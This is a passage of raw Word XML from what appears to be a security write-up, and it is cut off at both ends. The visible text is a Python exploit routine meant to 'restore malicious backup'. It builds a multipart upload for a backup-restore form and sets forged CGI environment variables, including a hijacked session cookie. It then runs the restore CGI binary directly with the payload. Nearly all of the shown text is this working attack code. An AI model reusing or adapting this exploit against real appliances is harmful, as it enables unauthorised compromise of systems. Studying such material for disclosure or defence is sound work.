            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53854858" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    """Handles CGI POST to restore malicious backup"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B35370E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="038DDAD2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    boundary = "-----------------------------" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_random_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>string.digits</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, 29)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74106FBF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="359BDAD6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>open(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>backup_path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="372725AD" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73DD20D5" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0541740F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B0E0D7C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        "\r\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>n</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25282411" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFC67BC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61245CAE" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="MAX_FILE_SIZE"',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B0460B1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01FE4C35" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "800000000",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13BE41EE" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F4158B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uploadFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"; filename="backup.tar.gz"',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22EB23F4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "Content-Type: application/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gzip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31CF12CB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7010D6B3" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{1}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="510992E1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77549355" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uploadBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02A51CAB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1349781B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "Upload Backup",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04916F31" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A636AF0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>actionStep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330A659C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E8E525" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>actionStep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71AB7D40" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>0}--</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF10506" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B5A8BEC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BB6C749" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>).format</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(boundary, data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E07FA62" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="131D6AA7" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["GATEWAY_INTERFACE"] = "CGI/1.1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A91559E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["REQUEST_METHOD"] = "POST"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648E7D24" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4963B9C0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        "HTTP_USER_AGENT"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D9D544" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ] = "Mozilla/5.0 (X11; Linux x86_64) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AppleWebKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CD7555C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">["REMOTE_ADDR"] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1BF2AB73" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["HTTP_COOKIE"] = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">=" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + "; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>menuPos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=51"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47A82C86" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["SCRIPT_NAME"] = "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>utilserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C0F10A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["REDIRECT_STATUS"] = "1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19EBD6BD" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["REQUEST_URI"] = "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>utilserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0799DCCB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["CONTENT_TYPE"] = "multipart/form-data; boundary=" + boundary[2:]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B7F9D7" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["CONTENT_LENGTH"] = str(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F87963" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27557AFF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.Popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="155C4CAD" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        [CGI_BIN, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>utilserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F639A1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>stdout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.PIPE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="510D927B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        stderr=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.STDOUT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B94CFB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        stdin=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.PIPE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FCAF9EC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E2AA2E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.stdin</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AA75936" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.stdin</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="111656CB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="210C6BFC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.stdout</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74976BE6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70135016" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2FF44DCF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>open(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
